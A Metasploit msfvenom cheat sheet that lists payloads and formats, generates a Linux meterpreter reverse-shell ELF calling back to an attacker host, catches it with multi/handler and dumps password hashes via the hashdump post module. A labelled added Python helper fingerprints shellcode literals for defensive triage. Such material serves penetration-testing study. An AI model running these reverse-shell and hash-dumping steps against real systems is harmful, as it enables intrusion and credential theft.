Msfvenom
Help menu
$ msfvenom -h
List available options for module type
$ msfvenom -l payloads
$ msfvenom -l encoders
$ msfvenom -l nops
$ msfvenom -l all
Payload option
$ msfvenom -p ...
# eg.
$ msfvenom -p linux/x86/shell_reverse_tcp
Format option
$ msfvenom -f ...
# eg.
$ msfvenom -f elf
$ msfvenom -f exe
Note: msfvenom emits shellcode (raw machine code, usually generated from assembly) for the architecture and payload selected with the -p flag. The -f flag only chooses the output format the shellcode is written in.
Eg. Powershell
[Byte[]] $buf = 0xfc,0x48,0x83,...
Eg. C
unsigned char buf[] = "\xfc\x48\x83...
Eg. Python
buf = b""
buf += b"\xfc\x48\x8
buf += b"\...
A script or program, in the chosen language, that loads and executes the bytes msfvenom emits still has to be written separately; msfvenom itself produces only the shellcode.
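The three layouts above (PowerShell byte array, C char array, Python byte string) all carry the same bytes in different clothing. The following added example, which is not part of the original cheat sheet and not msfvenom code, is a small triage helper a defender can run over a suspicious .ps1, .c or .py file found on a host: it recognises each layout, normalises it to raw bytes, and fingerprints the result so samples can be hashed and compared regardless of which -f format produced them. The sample inputs are constructed and contain only the three-byte prefix visible on the page plus filler; the prefix check is a weak, labelled heuristic, not a signature.

```python
"""Normalise msfvenom-style shellcode literals found in scripts into raw bytes.

Added example, not part of the cheat sheet and not msfvenom's own code.
Handles the three text layouts shown on the page (-f powershell, -f c,
-f python). Binary formats (-f raw, elf, exe) need no parsing: hash them directly.
"""
import hashlib
import re
from typing import Optional

# PowerShell layout:  [Byte[]] $buf = 0xfc,0x48,0x83,...   (may wrap across lines)
_PS_RE = re.compile(r'\[Byte\[\]\]\s*\$\w+\s*=\s*((?:0x[0-9a-fA-F]{2}\s*,?\s*)+)')
# C layout:  unsigned char buf[] = "\xfc\x48\x83..." ;   (several "..." pieces allowed)
_C_RE = re.compile(r'unsigned\s+char\s+\w+\[\]\s*=\s*((?:"(?:\\x[0-9a-fA-F]{2})*"\s*)+);')
# Python layout:  buf = b""  followed by  buf += b"\xfc\x48..."  lines
_PY_RE = re.compile(r'^\s*(\w+)\s*(?:\+?=)\s*b"((?:\\x[0-9a-fA-F]{2})*)"\s*$', re.MULTILINE)
_HEX_ESC = re.compile(r'\\x([0-9a-fA-F]{2})')

# Prefix visible in the page's samples (0xfc,0x48,0x83). Only a weak hint:
# plenty of benign code starts with the same bytes, so it is reported, not alerted on.
_PAGE_PREFIX = b"\xfc\x48\x83"


def extract_shellcode(text: str) -> Optional[bytes]:
    """Return the byte blob embedded in `text`, or None if no known layout matches."""
    m = _PS_RE.search(text)
    if m:
        tokens = re.findall(r'0x[0-9a-fA-F]{2}', m.group(1))
        return bytes(int(tok, 16) for tok in tokens)
    m = _C_RE.search(text)
    if m:
        return bytes(int(h, 16) for h in _HEX_ESC.findall(m.group(1)))
    # Python layout: concatenate every b"..." piece in file order.
    chunks = [body for _name, body in _PY_RE.findall(text)]
    if chunks:
        return bytes(int(h, 16) for h in _HEX_ESC.findall("".join(chunks)))
    return None


def fingerprint(blob: bytes) -> dict:
    """Canonical description of a blob, independent of the -f format it came in."""
    return {
        "length": len(blob),
        "sha256": hashlib.sha256(blob).hexdigest(),
        "has_page_prefix": blob.startswith(_PAGE_PREFIX),  # heuristic only
    }


def triage(text: str) -> Optional[dict]:
    """One-call helper: parse a script's text and fingerprint any embedded blob."""
    blob = extract_shellcode(text)
    return fingerprint(blob) if blob is not None else None


# Constructed samples: the page's visible prefix followed by two 0x90 filler
# bytes, rendered in each of the three layouts. Not a real payload.
SAMPLE_PS = "[Byte[]] $buf = 0xfc,0x48,0x83,\n0x90,0x90\n"
SAMPLE_C = 'unsigned char buf[] = \n"\\xfc\\x48\\x83"\n"\\x90\\x90";\n'
SAMPLE_PY = 'buf = b""\nbuf += b"\\xfc\\x48\\x83"\nbuf += b"\\x90\\x90"\n'

if __name__ == "__main__":
    for label, sample in (("powershell", SAMPLE_PS), ("c", SAMPLE_C), ("python", SAMPLE_PY)):
        print(label, triage(sample))
    print("no blob:", triage("Write-Host 'hello'"))
```

Because all three samples reduce to the same five bytes, their fingerprints are identical, which is the point: a hash database keyed on the normalised blob catches the same shellcode no matter which -f format the file was written in.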
Example
linux/x86/meterpreter/reverse_tcp
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.xxx.xxx LPORT=8000 -f elf > shell.elf
Module to use on the attacking machine to catch a shell
exploit/multi/handler
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost xxx.xxx.xxx.xxx
msf6 exploit(multi/handler) > set lport xxxx
msf6 exploit(multi/handler) > run
Run the shellcode on the target machine
# eg.
$ sudo ./shell.elf
A meterpreter session opens on the attacker machine
meterpreter >
Using the post-exploitation hashdump module
meterpreter > background
msf6 exploit(multi/handler) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/linux ... ...
msf6 exploit(multi/handler) > use post/linux/gather/hashdump
msf6 post(linux/gather/hashdump) > show options
msf6 post(linux/gather/hashdump) > set session 1
msf6 post(linux/gather/hashdump) > run
...